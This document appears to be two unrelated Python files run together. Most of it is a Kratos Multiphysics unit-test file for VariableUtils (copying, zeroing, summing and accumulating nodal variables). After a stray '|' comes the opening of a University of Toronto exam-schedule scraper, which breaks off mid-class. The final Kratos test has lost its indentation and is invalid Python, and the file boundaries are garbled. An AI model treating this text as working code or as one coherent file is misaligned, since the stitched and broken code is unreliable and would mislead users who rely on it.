    model_part = current_model.CreateModelPart("Main")
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.FORCE)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.REACTION)
    model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    model_part_io.ReadModelPart(model_part)

    # Source values
    visc_value = 0.1
    vect_value = KratosMultiphysics.Vector(3)
    vect_value[0] = 1.3
    vect_value[1] = 2.2
    vect_value[2] = 3.1

    variable_utils = KratosMultiphysics.VariableUtils()
    variable_utils.SetVariable(KratosMultiphysics.VISCOSITY, visc_value, model_part.Nodes)
    variable_utils.SetVariable(KratosMultiphysics.DISPLACEMENT, vect_value, model_part.Nodes)
    variable_utils.SetVariable(KratosMultiphysics.FORCE, vect_value, model_part.Nodes)
    # Copy scalar, component and vector values between variables
    variable_utils.CopyScalarVar(KratosMultiphysics.VISCOSITY, KratosMultiphysics.DENSITY, model_part.Nodes)
    variable_utils.CopyScalarVar(KratosMultiphysics.FORCE_X, KratosMultiphysics.REACTION_Y, model_part.Nodes)
    variable_utils.CopyScalarVar(KratosMultiphysics.FORCE_X, KratosMultiphysics.FORCE_Y, model_part.Nodes)
    variable_utils.CopyVectorVar(KratosMultiphysics.DISPLACEMENT, KratosMultiphysics.VELOCITY, model_part.Nodes)
    # Destination values must match their sources
    for node in model_part.Nodes:
        self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_X), node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_X))
        self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_Y), node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y))
        self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_Z), node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Z))
        self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.FORCE_X), node.GetSolutionStepValue(KratosMultiphysics.REACTION_Y))
        self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.FORCE_X), node.GetSolutionStepValue(KratosMultiphysics.FORCE_Y))
        self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.VISCOSITY), node.GetSolutionStepValue(KratosMultiphysics.DENSITY))
def test_save_var(self):
    """Checks the Save*Var family, which copies historical or non-historical
    values into the non-historical database."""
    current_model = KratosMultiphysics.Model()
    # Build the model part and read the reference mesh (provides the
    # historical VISCOSITY and DISPLACEMENT values)
    model_part = current_model.CreateModelPart("Main")
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    model_part_io.ReadModelPart(model_part)

    variable_utils = KratosMultiphysics.VariableUtils()
    # Historical -> non-historical copies
    variable_utils.SaveScalarVar(KratosMultiphysics.VISCOSITY, KratosMultiphysics.DENSITY, model_part.Nodes)
    variable_utils.SaveVectorVar(KratosMultiphysics.DISPLACEMENT, KratosMultiphysics.VELOCITY, model_part.Nodes)
    # Non-historical -> non-historical copies
    variable_utils.SaveScalarNonHistoricalVar(KratosMultiphysics.DENSITY, KratosMultiphysics.DISTANCE, model_part.Nodes)
    variable_utils.SaveVectorNonHistoricalVar(KratosMultiphysics.VELOCITY, KratosMultiphysics.VOLUME_ACCELERATION, model_part.Nodes)
    # Destination values must match their sources
    for node in model_part.Nodes:
        self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_X), node.GetValue(KratosMultiphysics.VELOCITY_X))
        self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_Y), node.GetValue(KratosMultiphysics.VELOCITY_Y))
        self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_Z), node.GetValue(KratosMultiphysics.VELOCITY_Z))
        self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.VISCOSITY), node.GetValue(KratosMultiphysics.DENSITY))
        self.assertEqual(node.GetValue(KratosMultiphysics.VOLUME_ACCELERATION_X), node.GetValue(KratosMultiphysics.VELOCITY_X))
        self.assertEqual(node.GetValue(KratosMultiphysics.VOLUME_ACCELERATION_Y), node.GetValue(KratosMultiphysics.VELOCITY_Y))
        self.assertEqual(node.GetValue(KratosMultiphysics.VOLUME_ACCELERATION_Z), node.GetValue(KratosMultiphysics.VELOCITY_Z))
        self.assertEqual(node.GetValue(KratosMultiphysics.DISTANCE), node.GetValue(KratosMultiphysics.DENSITY))
def test_set_variable_to_zero(self):
    """Checks SetNonHistoricalVariableToZero for a scalar (VISCOSITY) and a
    vector (DISPLACEMENT) variable on nodes, elements and conditions.

    Each entity set is first initialized with non-zero, Id-dependent values
    so the subsequent zeroing is actually exercised.
    """
    ## Set the model part
    current_model = KratosMultiphysics.Model()
    model_part = current_model.CreateModelPart("Main")
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    model_part_io.ReadModelPart(model_part)
    ## Initialize the variable values
    # BUGFIX: this loop iterated model_part.Elements while calling
    # node.SetValue, so the nodes were never initialized (and the elements
    # were written twice). Iterate the nodes, as the loop variable intends.
    for node in model_part.Nodes:
        node.SetValue(KratosMultiphysics.VISCOSITY, node.Id)
        node.SetValue(KratosMultiphysics.DISPLACEMENT, [node.Id, 2 * node.Id, 3.0 * node.Id])
    for elem in model_part.Elements:
        elem.SetValue(KratosMultiphysics.VISCOSITY, elem.Id)
        elem.SetValue(KratosMultiphysics.DISPLACEMENT, [elem.Id, 2 * elem.Id, 3.0 * elem.Id])
    for cond in model_part.Conditions:
        cond.SetValue(KratosMultiphysics.VISCOSITY, cond.Id)
        cond.SetValue(KratosMultiphysics.DISPLACEMENT, [cond.Id, 2 * cond.Id, 3.0 * cond.Id])
    ## Set the variable values to zero
    KratosMultiphysics.VariableUtils().SetNonHistoricalVariableToZero(KratosMultiphysics.VISCOSITY, model_part.Nodes)
    KratosMultiphysics.VariableUtils().SetNonHistoricalVariableToZero(KratosMultiphysics.VISCOSITY, model_part.Elements)
    KratosMultiphysics.VariableUtils().SetNonHistoricalVariableToZero(KratosMultiphysics.VISCOSITY, model_part.Conditions)
    KratosMultiphysics.VariableUtils().SetNonHistoricalVariableToZero(KratosMultiphysics.DISPLACEMENT, model_part.Nodes)
    KratosMultiphysics.VariableUtils().SetNonHistoricalVariableToZero(KratosMultiphysics.DISPLACEMENT, model_part.Elements)
    KratosMultiphysics.VariableUtils().SetNonHistoricalVariableToZero(KratosMultiphysics.DISPLACEMENT, model_part.Conditions)
    ## Verify the results: every scalar and every vector component is zero
    for node in model_part.Nodes:
        self.assertEqual(node.GetValue(KratosMultiphysics.VISCOSITY), 0.0)
        aux = node.GetValue(KratosMultiphysics.DISPLACEMENT)
        self.assertEqual(aux[0], 0.0)
        self.assertEqual(aux[1], 0.0)
        self.assertEqual(aux[2], 0.0)
    for elem in model_part.Elements:
        self.assertEqual(elem.GetValue(KratosMultiphysics.VISCOSITY), 0.0)
        aux = elem.GetValue(KratosMultiphysics.DISPLACEMENT)
        self.assertEqual(aux[0], 0.0)
        self.assertEqual(aux[1], 0.0)
        self.assertEqual(aux[2], 0.0)
    for cond in model_part.Conditions:
        self.assertEqual(cond.GetValue(KratosMultiphysics.VISCOSITY), 0.0)
        aux = cond.GetValue(KratosMultiphysics.DISPLACEMENT)
        self.assertEqual(aux[0], 0.0)
        self.assertEqual(aux[1], 0.0)
        self.assertEqual(aux[2], 0.0)
def test_set_nodal_historical_variable_to_zero(self):
    """Checks SetHistoricalVariableToZero on the nodal historical database."""
    current_model = KratosMultiphysics.Model()
    # Build the model part and read the reference mesh
    model_part = current_model.CreateModelPart("Main")
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    model_part_io.ReadModelPart(model_part)

    # Seed the historical database with Id-dependent non-zero values
    for node in model_part.Nodes:
        node.SetSolutionStepValue(KratosMultiphysics.VISCOSITY, node.Id)
        node.SetSolutionStepValue(KratosMultiphysics.DISPLACEMENT, [node.Id, 2.0 * node.Id, 3.0 * node.Id])

    # Zero both variables
    variable_utils = KratosMultiphysics.VariableUtils()
    variable_utils.SetHistoricalVariableToZero(KratosMultiphysics.VISCOSITY, model_part.Nodes)
    variable_utils.SetHistoricalVariableToZero(KratosMultiphysics.DISPLACEMENT, model_part.Nodes)

    # All scalar values and vector components must now be zero
    for node in model_part.Nodes:
        self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.VISCOSITY), 0.0)
        self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_X), 0.0)
        self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_Y), 0.0)
        self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_Z), 0.0)
def test_select_node_list(self):
    """Checks SelectNodeList, which gathers the nodes whose historical value
    of a variable equals a given reference value."""
    current_model = KratosMultiphysics.Model()
    # Build the model part and read the reference mesh
    model_part = current_model.CreateModelPart("Main")
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    model_part_io.ReadModelPart(model_part)

    # Select the nodes whose VISCOSITY equals 0.01 (set by the mdpa)
    selected_nodes = KratosMultiphysics.VariableUtils().SelectNodeList(KratosMultiphysics.VISCOSITY, 0.01, model_part.Nodes)
    selected_ids = [node.Id for node in selected_nodes]

    # The mdpa assigns that value to these four nodes
    for expected_id in (1, 2, 973, 974):
        self.assertTrue(model_part.Nodes[expected_id].Id in selected_ids)
def test_apply_fixity(self):
    """Checks ApplyFixity, which fixes or frees a DOF on a set of nodes."""
    current_model = KratosMultiphysics.Model()
    # Build the model part and read the reference mesh
    model_part = current_model.CreateModelPart("Main")
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    model_part_io.ReadModelPart(model_part)

    variable_utils = KratosMultiphysics.VariableUtils()
    # Register the DOFs the fixity will act on
    variable_utils.AddDof(KratosMultiphysics.VISCOSITY, model_part)
    variable_utils.AddDof(KratosMultiphysics.DISPLACEMENT_X, model_part)
    variable_utils.AddDof(KratosMultiphysics.DISPLACEMENT_Y, model_part)
    # Fix two of them, explicitly free the third
    variable_utils.ApplyFixity(KratosMultiphysics.VISCOSITY, True, model_part.Nodes)
    variable_utils.ApplyFixity(KratosMultiphysics.DISPLACEMENT_X, True, model_part.Nodes)
    variable_utils.ApplyFixity(KratosMultiphysics.DISPLACEMENT_Y, False, model_part.Nodes)
    # Check the resulting fixity
    for node in model_part.Nodes:
        self.assertTrue(node.IsFixed(KratosMultiphysics.VISCOSITY))
        self.assertTrue(node.IsFixed(KratosMultiphysics.DISPLACEMENT_X))
        self.assertFalse(node.IsFixed(KratosMultiphysics.DISPLACEMENT_Y))
def test_apply_vector(self):
    """Checks ApplyVector, which assigns the i-th entry of a data vector to
    the i-th node of the container."""
    current_model = KratosMultiphysics.Model()
    # Build the model part and read the reference mesh
    model_part = current_model.CreateModelPart("Main")
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    model_part_io.ReadModelPart(model_part)

    # Data vectors: [0, 1, 2, ...] and its double
    n_nodes = len(model_part.Nodes)
    data_vector_x1 = KratosMultiphysics.Vector(n_nodes)
    data_vector_x2 = KratosMultiphysics.Vector(n_nodes)
    for position in range(n_nodes):
        data_vector_x1[position] = position
        data_vector_x2[position] = 2.0 * position

    variable_utils = KratosMultiphysics.VariableUtils()
    variable_utils.ApplyVector(KratosMultiphysics.VISCOSITY, data_vector_x1, model_part.Nodes)
    variable_utils.ApplyVector(KratosMultiphysics.DISPLACEMENT_X, data_vector_x2, model_part.Nodes)

    # Each node must hold the vector entry matching its container position
    for position, node in enumerate(model_part.Nodes):
        self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.VISCOSITY), data_vector_x1[position])
        self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_X), data_vector_x2[position])
def test_sum_variable(self):
    """Checks the Sum* family over nodal (historical and non-historical),
    condition and element variables."""
    current_model = KratosMultiphysics.Model()
    # Build the model part and read the reference mesh
    model_part = current_model.CreateModelPart("Main")
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    model_part_io.ReadModelPart(model_part)

    scalar_val = 0.1
    vector_val = KratosMultiphysics.Vector(3)
    vector_val[0] = 1.0
    vector_val[1] = 2.0
    vector_val[2] = 3.0

    # Non-historical values on every entity type
    # (historical nodal values come from the mdpa)
    for node in model_part.Nodes:
        node.SetValue(KratosMultiphysics.DENSITY, scalar_val)
        node.SetValue(KratosMultiphysics.VELOCITY, vector_val)
    for condition in model_part.Conditions:
        condition.SetValue(KratosMultiphysics.DENSITY, scalar_val)
        condition.SetValue(KratosMultiphysics.VELOCITY, vector_val)
    for element in model_part.Elements:
        element.SetValue(KratosMultiphysics.DENSITY, scalar_val)
        element.SetValue(KratosMultiphysics.VELOCITY, vector_val)

    variable_utils = KratosMultiphysics.VariableUtils()

    # Nodal sums
    sum_hist_scal = variable_utils.SumHistoricalNodeScalarVariable(KratosMultiphysics.VISCOSITY, model_part, 0)
    sum_hist_vect = variable_utils.SumHistoricalNodeVectorVariable(KratosMultiphysics.DISPLACEMENT, model_part, 0)
    sum_nonhist_scal = variable_utils.SumNonHistoricalNodeScalarVariable(KratosMultiphysics.DENSITY, model_part)
    sum_nonhist_vect = variable_utils.SumNonHistoricalNodeVectorVariable(KratosMultiphysics.VELOCITY, model_part)
    self.assertAlmostEqual(sum_hist_scal, 0.04, delta=1e-6)
    self.assertAlmostEqual(sum_hist_vect[0], 0.3, delta=1e-6)
    self.assertAlmostEqual(sum_hist_vect[1], 0.001947, delta=1e-6)
    self.assertAlmostEqual(sum_hist_vect[2], 0.0, delta=1e-6)
    self.assertAlmostEqual(sum_nonhist_scal, 0.6, delta=1e-6)
    self.assertAlmostEqual(sum_nonhist_vect[0], 6.0, delta=1e-6)
    self.assertAlmostEqual(sum_nonhist_vect[1], 12.0, delta=1e-6)
    self.assertAlmostEqual(sum_nonhist_vect[2], 18.0, delta=1e-6)

    # Condition sums
    cond_scal = variable_utils.SumConditionScalarVariable(KratosMultiphysics.DENSITY, model_part)
    cond_vect = variable_utils.SumConditionVectorVariable(KratosMultiphysics.VELOCITY, model_part)
    self.assertAlmostEqual(cond_scal, 0.5, delta=1e-6)
    self.assertAlmostEqual(cond_vect[0], 5.0, delta=1e-6)
    self.assertAlmostEqual(cond_vect[1], 10.0, delta=1e-6)
    self.assertAlmostEqual(cond_vect[2], 15.0, delta=1e-6)

    # Element sums
    elem_scal = variable_utils.SumElementScalarVariable(KratosMultiphysics.DENSITY, model_part)
    elem_vect = variable_utils.SumElementVectorVariable(KratosMultiphysics.VELOCITY, model_part)
    self.assertAlmostEqual(elem_scal, 0.4, delta=1e-6)
    self.assertAlmostEqual(elem_vect[0], 4.0, delta=1e-6)
    self.assertAlmostEqual(elem_vect[1], 8.0, delta=1e-6)
    self.assertAlmostEqual(elem_vect[2], 12.0, delta=1e-6)
def test_UpdateCurrentToInitialConfiguration(self):
    """Checks UpdateCurrentToInitialConfiguration: after perturbing the
    current coordinates, they are reset to the initial ones."""
    current_model = KratosMultiphysics.Model()
    # Build the model part under test
    model_part = current_model.CreateModelPart("Main")
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    model_part_io.ReadModelPart(model_part)
    # Build an untouched reference copy of the same mesh
    ref_model_part = current_model.CreateModelPart("Reference")
    ref_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)
    ref_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
    ref_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    ref_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    ref_model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    ref_model_part_io.ReadModelPart(ref_model_part)

    # Perturb the current configuration of the tested model part ONLY
    offset = (0.1, -0.2, 0.3)
    for node in model_part.Nodes:
        node.X += offset[0]
        node.Y += offset[1]
        node.Z += offset[2]

    KratosMultiphysics.VariableUtils().UpdateCurrentToInitialConfiguration(model_part.Nodes)

    # Both the initial and the (reset) current coordinates must match the
    # untouched initial configuration of the reference model part
    for node, node_ref in zip(model_part.Nodes, ref_model_part.Nodes):
        self.assertAlmostEqual(node.X0, node_ref.X0)
        self.assertAlmostEqual(node.Y0, node_ref.Y0)
        self.assertAlmostEqual(node.Z0, node_ref.Z0)
        self.assertAlmostEqual(node.X, node_ref.X0)
        self.assertAlmostEqual(node.Y, node_ref.Y0)
        self.assertAlmostEqual(node.Z, node_ref.Z0)
def test_UpdateInitialToCurrentConfiguration(self):
    """Checks UpdateInitialToCurrentConfiguration: the initial coordinates
    are overwritten with the (perturbed) current ones."""
    current_model = KratosMultiphysics.Model()
    # Build the model part under test
    model_part = current_model.CreateModelPart("Main")
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    model_part_io.ReadModelPart(model_part)
    # Build a reference copy of the same mesh
    ref_model_part = current_model.CreateModelPart("Reference")
    ref_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)
    ref_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
    ref_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    ref_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    ref_model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    ref_model_part_io.ReadModelPart(ref_model_part)

    # Perturb the current configuration of BOTH model parts identically
    offset = (0.1, -0.2, 0.3)
    for node, node_ref in zip(model_part.Nodes, ref_model_part.Nodes):
        node.X += offset[0]
        node.Y += offset[1]
        node.Z += offset[2]
        node_ref.X += offset[0]
        node_ref.Y += offset[1]
        node_ref.Z += offset[2]

    KratosMultiphysics.VariableUtils().UpdateInitialToCurrentConfiguration(model_part.Nodes)

    # Both the (overwritten) initial and the current coordinates must match
    # the current configuration of the reference model part
    for node, node_ref in zip(model_part.Nodes, ref_model_part.Nodes):
        self.assertAlmostEqual(node.X0, node_ref.X)
        self.assertAlmostEqual(node.Y0, node_ref.Y)
        self.assertAlmostEqual(node.Z0, node_ref.Z)
        self.assertAlmostEqual(node.X, node_ref.X)
        self.assertAlmostEqual(node.Y, node_ref.Y)
        self.assertAlmostEqual(node.Z, node_ref.Z)
def test_UpdateCurrentPosition(self):
    """Checks UpdateCurrentPosition with the default DISPLACEMENT variable
    and with an alternative one (MESH_DISPLACEMENT)."""
    current_model = KratosMultiphysics.Model()
    # Build the model part and read the reference mesh
    model_part = current_model.CreateModelPart("Main")
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.MESH_DISPLACEMENT)
    model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    model_part_io.ReadModelPart(model_part)

    # Impose an Id-dependent DISPLACEMENT field
    for node in model_part.Nodes:
        imposed_disp = KratosMultiphysics.Vector(3)
        imposed_disp[0] = float(node.Id)
        imposed_disp[1] = 1.5 * float(node.Id)
        imposed_disp[2] = 2.0 * float(node.Id)
        node.SetSolutionStepValue(KratosMultiphysics.DISPLACEMENT, imposed_disp)
    # Update using the default variable (DISPLACEMENT)
    KratosMultiphysics.VariableUtils().UpdateCurrentPosition(model_part.Nodes)
    # Current position must equal initial position plus the displacement
    for node in model_part.Nodes:
        self.assertAlmostEqual(node.X, node.X0 + float(node.Id))
        self.assertAlmostEqual(node.Y, node.Y0 + 1.5 * float(node.Id))
        self.assertAlmostEqual(node.Z, node.Z0 + 2.0 * float(node.Id))

    # Impose a different field on MESH_DISPLACEMENT
    for node in model_part.Nodes:
        imposed_disp = KratosMultiphysics.Vector(3)
        imposed_disp[0] = 3.0 * float(node.Id)
        imposed_disp[1] = 4.0 * float(node.Id)
        imposed_disp[2] = 5.0 * float(node.Id)
        node.SetSolutionStepValue(KratosMultiphysics.MESH_DISPLACEMENT, imposed_disp)
    # Update using the alternative variable
    KratosMultiphysics.VariableUtils().UpdateCurrentPosition(model_part.Nodes, KratosMultiphysics.MESH_DISPLACEMENT)
    # Current position must reflect the MESH_DISPLACEMENT field instead
    for node in model_part.Nodes:
        self.assertAlmostEqual(node.X, node.X0 + 3.0 * float(node.Id))
        self.assertAlmostEqual(node.Y, node.Y0 + 4.0 * float(node.Id))
        self.assertAlmostEqual(node.Z, node.Z0 + 5.0 * float(node.Id))
def test_distribute_condition_variable(self):
    """Checks WeightedAccumulateConditionVariableOnNodes with direct
    (non-inverse) nodal weights."""
    current_model = KratosMultiphysics.Model()
    # Build the model part and read the reference mesh
    model_part = current_model.CreateModelPart("Main")
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    model_part_io.ReadModelPart(model_part)

    # Nodal weights: the node Id itself
    for node in model_part.Nodes:
        node.SetValue(KratosMultiphysics.AUX_MESH_VAR, node.Id)
    # Condition data: Id-dependent scalar and vector values
    for condition in model_part.Conditions:
        condition.SetValue(KratosMultiphysics.DISTANCE, condition.Id)
        cond_vector = KratosMultiphysics.Vector(3)
        cond_vector[0] = condition.Id * 3
        cond_vector[1] = condition.Id * 3 + 1
        cond_vector[2] = condition.Id * 3 + 2
        condition.SetValue(KratosMultiphysics.VELOCITY, cond_vector)

    variable_utils = KratosMultiphysics.VariableUtils()
    variable_utils.WeightedAccumulateConditionVariableOnNodes(model_part, KratosMultiphysics.DISTANCE, KratosMultiphysics.AUX_MESH_VAR, False)
    variable_utils.WeightedAccumulateConditionVariableOnNodes(model_part, KratosMultiphysics.VELOCITY, KratosMultiphysics.AUX_MESH_VAR, False)

    # Reference values for the test mesh
    distance_vector = [
        1.0, 3602.0, 10803.0, 3643056.0, 3789835.0, 1897352.0
    ]
    velocity_vector = [
        3.0, 4.0, 5.0, 10806.0, 10810.0, 10814.0, 32409.0, 32415.0, 32421.0, 10929168.0, 10931112.0, 10933056.0, 11369505.0, 11371451.0, 11373397.0, 5692056.0, 5693030.0, 5694004.0
    ]
    for local_index, node in enumerate(model_part.Nodes):
        self.assertEqual(node.GetValue(KratosMultiphysics.DISTANCE), distance_vector[local_index])
        self.assertEqual(node.GetValue(KratosMultiphysics.VELOCITY)[0], velocity_vector[local_index * 3])
        self.assertEqual(node.GetValue(KratosMultiphysics.VELOCITY)[1], velocity_vector[local_index * 3 + 1])
        self.assertEqual(node.GetValue(KratosMultiphysics.VELOCITY)[2], velocity_vector[local_index * 3 + 2])
def test_distribute_condition_variable_inverse(self):
current_model = KratosMultiphysics.Model()
##set the model part
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
for node in model_part.Nodes:
node.SetValue(KratosMultiphysics.AUX_MESH_VAR, 1.0 / node.Id)
for condition in model_part.Conditions:
condition.SetValue(KratosMultiphysics.DISTANCE, condition.Id)
vector = KratosMultiphysics.Vector(3)
vector[0] = condition.Id * 3
vector[1] = condition.Id * 3 + 1
vector[2] = condition.Id * 3 + 2
condition.SetValue(KratosMultiphysics.VELOCITY, vector)
variable_utils = KratosMultiphysics.VariableUtils()
variable_utils.WeightedAccumulateConditionVariableOnNodes(model_part, KratosMultiphysics.DISTANCE, KratosMultiphysics.AUX_MESH_VAR, True)
variable_utils.WeightedAccumulateConditionVariableOnNodes(model_part, KratosMultiphysics.VELOCITY, KratosMultiphysics.AUX_MESH_VAR, True)
distance_vector = [
1.0, 3602.0, 10803.0, 3643056.0, 3789835.0, 1897352.0
]
velocity_vector = [
3.0, 4.0, 5.0, 10806.0, 10810.0, 10814.0, 32409.0, 32415.0, 32421.0, 10929168.0, 10931112.0, 10933056.0, 11369505.0, 11371451.0, 11373397.0, 5692056.0, 5693030.0, 5694004.0
]
local_index = 0
for node in model_part.Nodes:
self.assertAlmostEqual(node.GetValue(KratosMultiphysics.DISTANCE), distance_vector[local_index])
self.assertAlmostEqual(node.GetValue(KratosMultiphysics.VELOCITY)[0], velocity_vector[local_index * 3])
self.assertAlmostEqual(node.GetValue(KratosMultiphysics.VELOCITY)[1], velocity_vector[local_index * 3 + 1])
self.assertAlmostEqual(node.GetValue(KratosMultiphysics.VELOCITY)[2], velocity_vector[local_index * 3 + 2])
local_index += 1
if __name__ == '__main__':
    # Silence INFO-level Kratos output during the run, then hand control to the test runner.
    KratosMultiphysics.Logger.GetDefaultOutput().SetSeverity(KratosMultiphysics.Logger.Severity.WARNING)
    KratosUnittest.main()
|
from collections import OrderedDict
from datetime import datetime
import requests
from bs4 import BeautifulSoup
from dateutil import parser
from data_parser.base_parser import BaseParser
from validations.schemas.exams_schema import ExamsSchema
def get_course_info(month, year, course_code):
    """Derive the exam id and course id for a course from its exam sitting.

    The course's session suffix depends on the exam month and on the season
    letter at the end of the course code ('F' fall, 'S' winter, 'Y' full year).

    Returns:
        (exam_id, course_id, course_code); exam_id and course_id are None when
        the month/season combination is not a recognized exam sitting.
    """
    season = course_code[-1]
    previous_fall = f'{int(year) - 1}9'
    term_suffixes = {
        'dec': {'F': f'{year}9', 'Y': previous_fall},
        'apr': {'S': f'{year}1', 'Y': previous_fall},
        'jun': {'F': f'{year}5F', 'Y': f'{year}5'},
        'jul': {'S': f'{year}5S', 'Y': f'{year}5'},
        'aug': {'S': f'{year}5S', 'Y': f'{year}5'},
    }
    month_key = month[:3].lower()
    exam_id = course_id = None
    suffix = term_suffixes.get(month_key, {}).get(season)
    if suffix is not None:
        course_id = f'{course_code}{suffix}'
        exam_id = f'{course_id}{month_key.upper()}{year}'
    return exam_id, course_id, course_code
# Currently only supports Art Sci at UTSG
class ExamsParser(BaseParser):
    """Scrape University of Toronto final-exam schedules into exams.json.

    Covers the Faculty of Arts & Science at UTSG plus the UTM and UTSC
    registrar pages. Each record stores the exam date, start/end expressed as
    seconds since midnight, the duration, and (UTSG only) the sections
    writing the exam.
    """
    # Schedule pages, one per campus.
    link_artsci = "https://www.artsci.utoronto.ca/current/faculty-registrar/exams/exam-schedule"
    link_utm = "https://student.utm.utoronto.ca/examschedule/finalexams.php"
